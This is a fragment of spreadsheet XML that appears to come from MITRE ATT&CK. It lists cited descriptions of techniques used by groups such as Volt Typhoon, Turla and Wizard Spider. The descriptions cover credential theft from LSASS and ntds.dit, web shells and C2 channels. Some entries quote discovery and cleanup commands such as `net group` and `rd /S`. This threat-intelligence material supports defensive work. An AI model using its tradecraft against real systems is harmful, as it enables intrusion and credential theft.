    <t>relationship--13ac3b6b-d008-44fa-88c3-53d0927961d2</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used HTTP and HTTPS for C2 communications.(Citation: ESET Turla Mosquito Jan 2018)(Citation: ESET Turla Mosquito May 2018)</t>
  </si>
  <si>
    <t>relationship--825aded7-3c93-47ec-9ba5-5bd5af4e2e2b</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used legitimate web services including Pastebin, Dropbox, and GitHub for C2 communications.(Citation: Accenture HyperStack October 2020)(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>relationship--e0e492ef-c67d-4a02-be8d-2e9a650ea6f0</t>
  </si>
  <si>
    <t>03 December 2020</t>
  </si>
  <si>
    <t>04 December 2020</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has created web accounts including Dropbox and GitHub for C2 and document exfiltration.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>relationship--1a51277b-0f14-4d8a-88cb-6616da7b4a98</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has frequently used compromised WordPress sites for C2 infrastructure.(Citation: Recorded Future Turla Infra 2020)</t>
  </si>
  <si>
    <t>relationship--01b5af07-512b-4b60-ba2d-5c185b80fb5f</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have used cmd.exe to execute commands.(Citation: ESET Turla PowerShell May 2019)(Citation: Symantec Waterbug Jun 2019)</t>
  </si>
  <si>
    <t>relationship--9850f990-17ed-40f5-8065-a455f1198404</t>
  </si>
  <si>
    <t xml:space="preserve">[Turla](https://attack.mitre.org/groups/G0010) has gathered credentials from the Windows Credential Manager tool.(Citation: Symantec Waterbug Jun 2019)	</t>
  </si>
  <si>
    <t>relationship--2188382d-d557-4a81-9713-7ef4cc675e76</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used WMI event filters and consumers to establish persistence.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>relationship--9263ab45-f7d5-4bcf-af7e-d7be1913c3d6</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) established persistence by adding a Shell value under the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&lt;/code&gt;.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>relationship--ce9c90e9-d408-485e-a380-52a87abcf3fc</t>
  </si>
  <si>
    <t xml:space="preserve">[Volatile Cedar](https://attack.mitre.org/groups/G0123) has targeted publicly facing web servers, with both automatic and manual vulnerability discovery.(Citation: CheckPoint Volatile Cedar March 2015) (Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>relationship--c4bc8f71-e4f4-42b8-a39f-b4512987a423</t>
  </si>
  <si>
    <t>[Volatile Cedar](https://attack.mitre.org/groups/G0123) can deploy additional tools.(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
    <t>relationship--aaac742e-ad51-470d-826c-8196cf3c1d3e</t>
  </si>
  <si>
    <t>[Volatile Cedar](https://attack.mitre.org/groups/G0123) has performed vulnerability scans of the target server.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
    <t>relationship--1637c874-852e-4ab9-b6e0-2c855da74ef0</t>
  </si>
  <si>
    <t xml:space="preserve">[Volatile Cedar](https://attack.mitre.org/groups/G0123) can inject web shell code into a server.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>relationship--60b2c702-e2f4-47fd-a009-3ba561bceeb8</t>
  </si>
  <si>
    <t>[Volatile Cedar](https://attack.mitre.org/groups/G0123) has used DirBuster and GoBuster to brute force web directories and DNS subdomains.(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
    <t>relationship--2045cbbe-6046-44ae-a255-6c038da68cd5</t>
  </si>
  <si>
    <t>[Volt Typhoon](https://attack.mitre.org/groups/G1017) has archived the ntds.dit database as a multi-volume password-protected archive with 7-Zip.(Citation: Secureworks BRONZE SILHOUETTE May 2023)</t>
  </si>
  <si>
    <t>relationship--3d6d5bc0-2160-4152-9a4b-b2f19a8768b4</t>
  </si>
  <si>
    <t>[Volt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t>
  </si>
  <si>
    <t>relationship--1e81cdcc-e258-479f-9588-3649509bfcd1</t>
  </si>
  <si>
    <t>[Volt Typhoon](https://attack.mitre.org/groups/G1017) have inspected server logs to remove their IPs.(Citation: Secureworks BRONZE SILHOUETTE May 2023)</t>
  </si>
  <si>
    <t>relationship--e961cbae-92dc-48bf-9284-440173292c44</t>
  </si>
  <si>
    <t>[Volt Typhoon](https://attack.mitre.org/groups/G1017) has attempted to obtain credentials from OpenSSH, realvnc, and PuTTY.(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)</t>
  </si>
  <si>
    <t>relationship--29f40ca0-8255-44f3-afea-8facfd150314</t>
  </si>
  <si>
    <t>[Volt Typhoon](https://attack.mitre.org/groups/G1017) has staged collected data in password-protected archives.(Citation: Microsoft Volt Typhoon May 2023)</t>
  </si>
  <si>
    <t>relationship--2f9e7f23-979c-4d7f-a19c-907dc94504aa</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</si>
  <si>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</si>
  <si>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relationship--d5f428f5-4c16-495e-bc79-882a92ce75e0</t>
  </si>
  <si>
    <t>[Volt Typhoon](https://attack.mitre.org/groups/G1017) has run `net group /dom` and `net group "Domain Admins" /dom` in compromised environments for account discovery.(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023)</t>
  </si>
  <si>
    <t>relationship--e52c1bab-01f3-47c0-a5c9-361ba56d7e6a</t>
  </si>
  <si>
    <t>[Volt Typhoon](https://attack.mitre.org/groups/G1017) has used compromised domain accounts to authenticate to devices on compromised networks.(Citation: Microsoft Volt Typhoon May 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023)</t>
  </si>
  <si>
    <t>relationship--d51a3ee4-4542-4334-9989-249aa107c261</t>
  </si>
  <si>
    <t>[Volt Typhoon](https://attack.mitre.org/groups/G1017) has run `net group` in compromised environments to discover domain groups.(Citation: Secureworks BRONZE SILHOUETTE May 2023)</t>
  </si>
  <si>
    <t>relationship--3e17459a-edb2-471c-87b0-1315f3500ab6</t>
  </si>
  <si>
    <t>[Volt Typhoon](https://attack.mitre.org/groups/G1017) gained initial access through exploitation of CVE-2021-40539 in internet-facing ManageEngine ADSelfService Plus servers.(Citation: Secureworks BRONZE SILHOUETTE May 2023)</t>
  </si>
  <si>
    <t>relationship--284eb222-c310-480c-aaaa-82c1d5c64e62</t>
  </si>
  <si>
    <t>[Volt Typhoon](https://attack.mitre.org/groups/G1017) has run `rd /S` to delete their working directories and files.(Citation: Secureworks BRONZE SILHOUETTE May 2023)</t>
  </si>
  <si>
    <t>relationship--c4d3d8d6-95a9-4d1d-bd51-ad736c0a4b41</t>
  </si>
  <si>
    <t>[Volt Typhoon](https://attack.mitre.org/groups/G1017) has used the built-in [netsh](https://attack.mitre.org/software/S0108) `port proxy` command to create proxies on compromised systems to facilitate access.(Citation: Microsoft Volt Typhoon May 2023)</t>
  </si>
  <si>
    <t>relationship--828d0030-009d-4612-ae30-9dfa3d139e26</t>
  </si>
  <si>
    <t>[Volt Typhoon](https://attack.mitre.org/groups/G1017) has attempted to access hashed credentials from the LSASS process memory space.(Citation: Microsoft Volt Typhoon May 2023)</t>
  </si>
  <si>
    <t>relationship--5c96f40f-8cbc-4561-9a1f-ce9dad5808d5</t>
  </si>
  <si>
    <t>[Volt Typhoon](https://attack.mitre.org/groups/G1017) has copied web shells between servers in targeted environments.(Citation: Secureworks BRONZE SILHOUETTE May 2023)</t>
  </si>
  <si>
    <t>relationship--4893fd0f-c256-4b74-a3d8-aef48794550a</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</si>
  <si>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</si>
  <si>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relationship--fbeb5e6c-5574-4d41-add3-01efec419ae7</t>
  </si>
  <si>
    <t xml:space="preserve">
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has run `net localgroup administrators` in compromised environments to enumerate accounts.(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)
</t>
  </si>
  <si>
    <t>relationship--c08d8f49-5cca-4463-81db-bb80cc9a7af6</t>
  </si>
  <si>
    <t>[Volt Typhoon](https://attack.mitre.org/groups/G1017) has used `wevtutil.exe` and the PowerShell command `Get-EventLog security` to enumerate Windows logs to search for successful logons.(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)</t>
  </si>
  <si>
    <t>relationship--6848a6be-5571-4e88-b95d-45d9a11d4758</t>
  </si>
  <si>
    <t>[Volt Typhoon](https://attack.mitre.org/groups/G1017) has appended copies of the ntds.dit database with a .gif file extension.(Citation: Secureworks BRONZE SILHOUETTE May 2023)</t>
  </si>
  <si>
    <t>relationship--21b87986-57d0-45a7-9a42-f3e7803cf337</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</si>
  <si>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</si>
  <si>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relationship--20384b7e-e720-44ed-9aea-7f6857ce18c1</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</si>
  <si>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</si>
  <si>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relationship--582f4641-f68d-4dad-96e0-eb4da4128bbf</t>
  </si>
  <si>
    <t>[Volt Typhoon](https://attack.mitre.org/groups/G1017) has used PowerShell including for remote system discovery.(Citation: Microsoft Volt Typhoon May 2023)(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)</t>
  </si>
  <si>
    <t>relationship--68019421-95db-4416-879d-bb68c063dd78</t>
  </si>
  <si>
    <t>[Volt Typhoon](https://attack.mitre.org/groups/G1017) has enumerated running processes on targeted systems.(Citation: Microsoft Volt Typhoon May 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023)</t>
  </si>
  <si>
    <t>relationship--0ffa13fd-ca80-4541-a166-9c297145180d</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</si>
  <si>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</si>
  <si>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relationship--1542332b-788b-4c1e-b5e5-69d032cb7814</t>
  </si>
  <si>
    <t>[Volt Typhoon](https://attack.mitre.org/groups/G1017) has queried the Registry on compromised systems, `reg query hklm\software\`, for information on installed software.(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)</t>
  </si>
  <si>
    <t>relationship--de4a0c7c-2a21-4038-8466-7f933be35d95</t>
  </si>
  <si>
    <t>[Volt Typhoon](https://attack.mitre.org/groups/G1017) has used multiple methods, including [Ping](https://attack.mitre.org/software/S0097), to enumerate systems on compromised networks.(Citation: Microsoft Volt Typhoon May 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023)</t>
  </si>
  <si>
    <t>relationship--40356b61-2279-47ef-b7bd-4b355e2fb98a</t>
  </si>
  <si>
    <t>[Volt Typhoon](https://attack.mitre.org/groups/G1017) has used compromised PRTG servers from other organizations for C2.(Citation: Secureworks BRONZE SILHOUETTE May 2023)</t>
  </si>
  <si>
    <t>relationship--12948e09-2774-4b91-b9d1-018b41f7f923</t>
  </si>
  <si>
    <t>[Volt Typhoon](https://attack.mitre.org/groups/G1017) has queried the Registry on compromised systems for information on installed software.(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)</t>
  </si>
  <si>
    <t>relationship--16ccf88b-5f28-41d3-bc34-6580be0dbe3f</t>
  </si>
  <si>
    <t>[Volt Typhoon](https://attack.mitre.org/groups/G1017) has used a version of the Awen web shell that employed AES encryption and decryption for C2 communications.(Citation: Secureworks BRONZE SILHOUETTE May 2023)</t>
  </si>
  <si>
    <t>relationship--5a347320-15ce-40b9-8b9f-05f7c0c3ff9c</t>
  </si>
  <si>
    <t>[Volt Typhoon](https://attack.mitre.org/groups/G1017) has run system checks to determine if they were operating in a virtualized environment.(Citation: Microsoft Volt Typhoon May 2023)</t>
  </si>
  <si>
    <t>relationship--56889f30-eb6c-4286-b25a-39d35f93a1c0</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</si>
  <si>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</si>
  <si>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relationship--514a384a-2b09-4b4f-9def-8e4007b49734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</si>
  <si>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</si>
  <si>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relationship--3ee66a23-0783-4292-b4be-cc227932800c</t>
  </si>
  <si>
    <t xml:space="preserve">
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has used `netstat -ano` on compromised hosts to enumerate network connections.(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023)                                                   </t>
  </si>
  <si>
    <t>relationship--643a223a-76fa-4a34-9197-3acbc5aff205</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</si>
  <si>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</si>
  <si>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relationship--93965fb7-e50d-45c8-a0db-354ce8ee05b8</t>
  </si>
  <si>
    <t>[Volt Typhoon](https://attack.mitre.org/groups/G1017) has used customized versions of open-source tools for C2.(Citation: Microsoft Volt Typhoon May 2023)</t>
  </si>
  <si>
    <t>relationship--e2ced722-52bf-40ae-9627-99b5bf72b680</t>
  </si>
  <si>
    <t>[Volt Typhoon](https://attack.mitre.org/groups/G1017) has used webshells, including ones named AuditReport.jspx and iisstart.aspx, in compromised environments.(Citation: Secureworks BRONZE SILHOUETTE May 2023)</t>
  </si>
  <si>
    <t>relationship--9ca80e08-f365-48c6-bb40-24657614b217</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</si>
  <si>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</si>
  <si>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relationship--261d9569-d779-4f76-a7e3-6f704afc8185</t>
  </si>
  <si>
    <t>[Volt Typhoon](https://attack.mitre.org/groups/G1017) has leveraged WMIC including for execution and remote system discovery.(Citation: Microsoft Volt Typhoon May 2023)(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023)</t>
  </si>
  <si>
    <t>relationship--40b2270c-1549-44dc-87b2-d263941eb951</t>
  </si>
  <si>
    <t>[WIRTE](https://attack.mitre.org/groups/G0090) has used Base64 to decode malicious VBS script.(Citation: Lab52 WIRTE Apr 2019)</t>
  </si>
  <si>
    <t>relationship--19f9e4af-3ad9-4d0d-b4af-db145f514be9</t>
  </si>
  <si>
    <t>[WIRTE](https://attack.mitre.org/groups/G0090) has downloaded PowerShell code from the C2 server to be executed.(Citation: Lab52 WIRTE Apr 2019)</t>
  </si>
  <si>
    <t>relationship--cecf4306-a80e-4e65-b701-7e934adc6c42</t>
  </si>
  <si>
    <t>[WIRTE](https://attack.mitre.org/groups/G0090) has attempted to lure users into opening malicious MS Word and Excel files to execute malicious payloads.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>relationship--178dda13-999c-481f-8a1b-8dc062d7b0ff</t>
  </si>
  <si>
    <t>[WIRTE](https://attack.mitre.org/groups/G0090) has named a first stage dropper `Kaspersky Update Agent` in order to appear legitimate.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>relationship--4258f16d-4484-4b5f-8a2b-76366b2ee46c</t>
  </si>
  <si>
    <t>[WIRTE](https://attack.mitre.org/groups/G0090) has used HTTPS over ports 2083 and 2087 for C2.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>relationship--0076c114-0e7a-45c3-a851-7a877a9eefd0</t>
  </si>
  <si>
    <t>[WIRTE](https://attack.mitre.org/groups/G0090) has used PowerShell for script execution.(Citation: Lab52 WIRTE Apr 2019)</t>
  </si>
  <si>
    <t>relationship--0068ee65-0945-4f69-ba81-163ffbc05e53</t>
  </si>
  <si>
    <t>[WIRTE](https://attack.mitre.org/groups/G0090) has used `regsvr32.exe` to trigger the execution of a malicious script.(Citation: Lab52 WIRTE Apr 2019)</t>
  </si>
  <si>
    <t>relationship--cca195e2-b748-4881-b2bf-e6b3b993b460</t>
  </si>
  <si>
    <t>[WIRTE](https://attack.mitre.org/groups/G0090) has sent emails to intended victims with malicious MS Word and Excel attachments.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>relationship--1aeb4dce-ac27-43ae-a0f4-1afcf84fc1a9</t>
  </si>
  <si>
    <t>[WIRTE](https://attack.mitre.org/groups/G0090) has obtained and used [Empire](https://attack.mitre.org/software/S0363) for post-exploitation activities.(Citation: Lab52 WIRTE Apr 2019)</t>
  </si>
  <si>
    <t>relationship--6e20b61f-bf7e-40a3-b7b9-98d79e5a3ecd</t>
  </si>
  <si>
    <t xml:space="preserve">[WIRTE](https://attack.mitre.org/groups/G0090) has used VBScript  in its operations.(Citation: Lab52 WIRTE Apr 2019)	</t>
  </si>
  <si>
    <t>relationship--0f7fd21f-9cba-411a-a8dc-f5689d294037</t>
  </si>
  <si>
    <t xml:space="preserve">[WIRTE](https://attack.mitre.org/groups/G0090) has used HTTP for network communication.(Citation: Lab52 WIRTE Apr 2019)	</t>
  </si>
  <si>
    <t>relationship--7fd96b72-6402-4f0e-b1fa-bc7f081626de</t>
  </si>
  <si>
    <t>[Whitefly](https://attack.mitre.org/groups/G0107) has used a simple remote shell tool that will call back to the C2 server and wait for commands.(Citation: Symantec Whitefly March 2019)</t>
  </si>
  <si>
    <t>relationship--92b00f56-c9ac-4e48-9890-40b78ab0c361</t>
  </si>
  <si>
    <t xml:space="preserve">[Whitefly](https://attack.mitre.org/groups/G0107) has used search order hijacking to run the loader Vcrodat.(Citation: Symantec Whitefly March 2019)	</t>
  </si>
  <si>
    <t>relationship--2e2daf37-1d3d-4b24-ab46-dfc894f9ef96</t>
  </si>
  <si>
    <t xml:space="preserve">[Whitefly](https://attack.mitre.org/groups/G0107) has used an open-source tool to exploit a known Windows privilege escalation vulnerability (CVE-2016-0051) on unpatched computers.(Citation: Symantec Whitefly March 2019)	</t>
  </si>
  <si>
    <t>relationship--76681016-c8a2-4dcf-bac5-4a58749f326d</t>
  </si>
  <si>
    <t>[Whitefly](https://attack.mitre.org/groups/G0107) has the ability to download additional tools from the C2.(Citation: Symantec Whitefly March 2019)</t>
  </si>
  <si>
    <t>relationship--1898925b-236a-4847-8a97-e934c07cdde1</t>
  </si>
  <si>
    <t>[Whitefly](https://attack.mitre.org/groups/G0107) has used [Mimikatz](https://attack.mitre.org/software/S0002) to obtain credentials.(Citation: Symantec Whitefly March 2019)</t>
  </si>
  <si>
    <t>relationship--5ee2ba47-9b66-4a62-8bde-ff29409d4830</t>
  </si>
  <si>
    <t>[Whitefly](https://attack.mitre.org/groups/G0107) has used malicious .exe or .dll files disguised as documents or images.(Citation: Symantec Whitefly March 2019)</t>
  </si>
  <si>
    <t>relationship--983bd6cd-907a-430d-a6ec-0ca024ca87ae</t>
  </si>
  <si>
    <t>[Whitefly](https://attack.mitre.org/groups/G0107) has named the malicious DLL the same name as DLLs belonging to legitimate software from various security vendors.(Citation: Symantec Whitefly March 2019)</t>
  </si>
  <si>
    <t>relationship--aca1a51b-89a5-45e9-bce5-14b5a0a4c0f1</t>
  </si>
  <si>
    <t xml:space="preserve">[Whitefly](https://attack.mitre.org/groups/G0107) has encrypted the payload used for C2.(Citation: Symantec Whitefly March 2019)	</t>
  </si>
  <si>
    <t>relationship--95c6eafc-4b3f-404b-86d9-13b4ae4845da</t>
  </si>
  <si>
    <t>[Whitefly](https://attack.mitre.org/groups/G0107) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: Symantec Whitefly March 2019)</t>
  </si>
  <si>
    <t>relationship--8b65bc11-9b56-4eca-9fa2-efb7ffcbb94b</t>
  </si>
  <si>
    <t>[Windigo](https://attack.mitre.org/groups/G0124) has used a Perl script for information gathering.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>relationship--bea0bf7c-62c8-4334-b523-5cc6ec8b36c8</t>
  </si>
  <si>
    <t>11 February 2021</t>
  </si>
  <si>
    <t>[Windigo](https://attack.mitre.org/groups/G0124) has used a script to gather credentials in files left on disk by OpenSSH backdoors.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>relationship--24b8eeb2-ee0d-402b-b2e0-afaa3c867072</t>
  </si>
  <si>
    <t>[Windigo](https://attack.mitre.org/groups/G0124) has distributed Windows malware via drive-by downloads.(Citation: ESET Windigo Mar 2014)</t>
  </si>
  <si>
    <t>relationship--f983de6b-eb17-4947-b4b0-50bd530f50e3</t>
  </si>
  <si>
    <t>[Windigo](https://attack.mitre.org/groups/G0124) has used a script to check for the presence of files created by OpenSSH backdoors.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>relationship--e2116500-b22a-44f6-ad5b-c3e579a67491</t>
  </si>
  <si>
    <t>[Windigo](https://attack.mitre.org/groups/G0124) has delivered a generic Windows proxy Win32/Glubteta.M. [Windigo](https://attack.mitre.org/groups/G0124) has also used multiple reverse proxy chains as part of their C2 infrastructure.(Citation: ESET Windigo Mar 2014)</t>
  </si>
  <si>
    <t>relationship--7c776fbc-592a-4643-bd4f-423546a4732e</t>
  </si>
  <si>
    <t>[Windigo](https://attack.mitre.org/groups/G0124) has used a script to detect installed software on targeted systems.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>relationship--39c98d86-3f44-4a47-b7e5-4cb3e4bf97a7</t>
  </si>
  <si>
    <t>[Windigo](https://attack.mitre.org/groups/G0124) has used a script to detect which Linux distribution and version is currently installed on the system.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>relationship--06ae1d46-2349-457e-817b-e9fdca2f7768</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used compromised websites to register custom URL schemes on a remote system.(Citation: objective-see windtail1 dec 2018)</t>
  </si>
  <si>
    <t>relationship--0c3668cf-32c1-420f-a1c0-0c8598360ad8</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used tools to deploy additional payloads to compromised hosts.(Citation: BlackBerry Bahamut)</t>
  </si>
  <si>
    <t>relationship--c43ec2e6-3769-4a1c-b99a-2d8988c7a207</t>
  </si>
  <si>
    <t>24 May 2021</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used revoked certificates to sign malware.(Citation: objective-see windtail1 dec 2018)(Citation: SANS Windshift August 2018)</t>
  </si>
  <si>
    <t>relationship--893c9a7a-7f2c-4b96-877e-06870d5f989f</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used e-mail attachments to lure victims into executing malicious code.(Citation: SANS Windshift August 2018)</t>
  </si>
  <si>
    <t>relationship--f7800d2b-7eb5-4efe-ac8d-503c187d18ef</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used links embedded in e-mails to lure victims into executing malicious code.(Citation: SANS Windshift August 2018)</t>
  </si>
  <si>
    <t>relationship--2332793b-afd0-407b-a1dc-97c5c7580bcb</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</si>
  <si>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</si>
  <si>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relationship--ad880548-e776-4e7b-995d-ce6fdc91e865</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used string encoding with floating point calculations.(Citation: BlackBerry Bahamut)</t>
  </si>
  <si>
    <t>relationship--996defcb-8a62-4271-9d01-93d66525b159</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used malware to enumerate active processes.(Citation: BlackBerry Bahamut)</t>
  </si>
  <si>
    <t>relationship--09237e32-a423-4ce3-bb15-4e47848ee7f7</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has created LNK files in the Startup folder to establish persistence.(Citation: BlackBerry Bahamut)</t>
  </si>
  <si>
    <t>relationship--6aeeb7e4-fc09-40a6-b071-c04df0f92928</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used malware to identify installed AV and commonly used forensic and malware analysis tools.(Citation: BlackBerry Bahamut)</t>
  </si>
  <si>
    <t>relationship--1a2f3d08-8a75-4ad5-8aba-445d37ebbff8</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used malware to identify installed software.(Citation: BlackBerry Bahamut)</t>
  </si>
  <si>
    <t>relationship--715262b6-9d31-4589-ba53-fb5d7be3f1f5</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has sent spearphishing emails with attachment to harvest credentials and deliver malware.(Citation: SANS Windshift August 2018)</t>
  </si>
  <si>
    <t>relationship--1ab045b8-35b4-4920-8223-d1a6b8c6ae1e</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has sent spearphishing emails with links to harvest credentials and deliver malware.(Citation: SANS Windshift August 2018)</t>
  </si>
  <si>
    <t>relationship--88157c8d-48d7-4114-8783-d22999a8f990</t>
  </si>
  <si>
    <t xml:space="preserve">[Windshift](https://attack.mitre.org/groups/G0112) has used fake personas on social media to engage and target victims.(Citation: SANS Windshift August 2018)	</t>
  </si>
  <si>
    <t>relationship--241c2c47-3659-4899-bf5b-64f0ed94c916</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used malware to identify the computer name of a compromised host.(Citation: BlackBerry Bahamut)</t>
  </si>
  <si>
    <t>relationship--ea41718b-4215-43d4-8d1f-def88af935e3</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used malware to identify the username on a compromised host.(Citation: BlackBerry Bahamut)</t>
  </si>
  <si>
    <t>relationship--caf951a5-6952-4966-941d-71d9cd598b28</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used Visual Basic 6 (VB6) payloads.(Citation: BlackBerry Bahamut)</t>
  </si>
  <si>
    <t>relationship--116f105a-ee8c-4544-9164-a0a28a572228</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used tools that communicate with C2 over HTTP.(Citation: BlackBerry Bahamut)</t>
  </si>
  <si>
    <t>relationship--aca30dc6-34c2-45f3-87a4-9d9abda01036</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used WMI to collect information about target machines.(Citation: BlackBerry Bahamut)</t>
  </si>
  <si>
    <t>relationship--c53a4d1a-7d41-451e-a4f8-4f69ad27ab7d</t>
  </si>
  <si>
    <t>[Winnti Group](https://attack.mitre.org/groups/G0044) used stolen certificates to sign its malware.(Citation: Kaspersky Winnti April 2013)</t>
  </si>
  <si>
    <t>relationship--f28627be-fddd-455c-b001-abddaaa29fa7</t>
  </si>
  <si>
    <t>[Winnti Group](https://attack.mitre.org/groups/G0044) has registered domains for C2 that mimicked sites of their intended targets.(Citation: Kaspersky Winnti April 2013)</t>
  </si>
  <si>
    <t>relationship--e6dadc21-2dcd-41fc-a706-a08942551487</t>
  </si>
  <si>
    <t>[Winnti Group](https://attack.mitre.org/groups/G0044) has used a program named ff.exe to search for specific documents on compromised hosts.(Citation: Kaspersky Winnti April 2013)</t>
  </si>
  <si>
    <t>relationship--db0b0cf9-cb49-43ed-aa61-d4215d1775b8</t>
  </si>
  <si>
    <t>[Winnti Group](https://attack.mitre.org/groups/G0044) has downloaded an auxiliary program named ff.exe to infected machines.(Citation: Kaspersky Winnti April 2013)</t>
  </si>
  <si>
    <t>relationship--c21009bb-5a7b-438d-9aed-1ec85cbd0d75</t>
  </si>
  <si>
    <t>[Winnti Group](https://attack.mitre.org/groups/G0044) looked for a specific process running on infected servers.(Citation: Kaspersky Winnti April 2013)</t>
  </si>
  <si>
    <t>relationship--e8cb4430-db05-4029-b011-926a2ba17a4c</t>
  </si>
  <si>
    <t>[Winnti Group](https://attack.mitre.org/groups/G0044) used a rootkit to modify typical server functionality.(Citation: Kaspersky Winnti April 2013)</t>
  </si>
  <si>
    <t>relationship--05e05236-1635-48d7-8ee3-33319c01c815</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has archived data into ZIP files on compromised machines.(Citation: Mandiant FIN12 Oct 2021)</t>
  </si>
  <si>
    <t>relationship--18437772-ace9-4a63-b928-8f313dc44f1e</t>
  </si>
  <si>
    <t xml:space="preserve">[Wizard Spider](https://attack.mitre.org/groups/G0102) has used batch scripts that utilizes WMIC to execute a [BITSAdmin](https://attack.mitre.org/software/S0190) transfer of a ransomware payload to each compromised machine.(Citation: Mandiant FIN12 Oct 2021) </t>
  </si>
  <si>
    <t>relationship--fb229043-04d8-40e8-a155-bd2471bfc5c3</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used Digicert code-signing certificates for some of its malware.(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)</t>
  </si>
  <si>
    <t>relationship--9438f268-3827-435b-98b5-79dbc0ee5213</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has obtained code signing certificates signed by DigiCert, GlobalSign, and COMOOD for malware payloads.(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)(Citation: Mandiant FIN12 Oct 2021)</t>
  </si>
  <si>
    <t>relationship--00a88d6f-fa8c-48bf-a028-fb75ca04e000</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) used Base64 encoding to obfuscate an [Empire](https://attack.mitre.org/software/S0363) service and PowerShell commands.(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: DFIR Ryuk's Return October 2020)</t>
  </si>
  <si>
    <t>relationship--5a2c4561-48e4-4d51-8f00-ff470a18df32</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has collected and staged credentials and network enumeration information, using  the networkdll and psfin [TrickBot](https://attack.mitre.org/software/S0266) modules.(Citation: CrowdStrike Grim Spider May 2019)</t>
  </si>
  <si>
    <t>relationship--2c54816e-5dd1-4723-99f5-29c80a2fc171</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has collected data from a compromised host prior to exfiltration.(Citation: Mandiant FIN12 Oct 2021)</t>
  </si>
  <si>
    <t>relationship--e199c02e-a45c-4eca-ab24-7b037167c775</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</si>
  <si>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</si>
  <si>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relationship--dae7228a-89f0-4e1c-b306-b9f6d08b902d</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</si>
  <si>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</si>
  <si>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relationship--82dee5a5-7890-4bed-bc8c-83ffa13a8bcf</t>
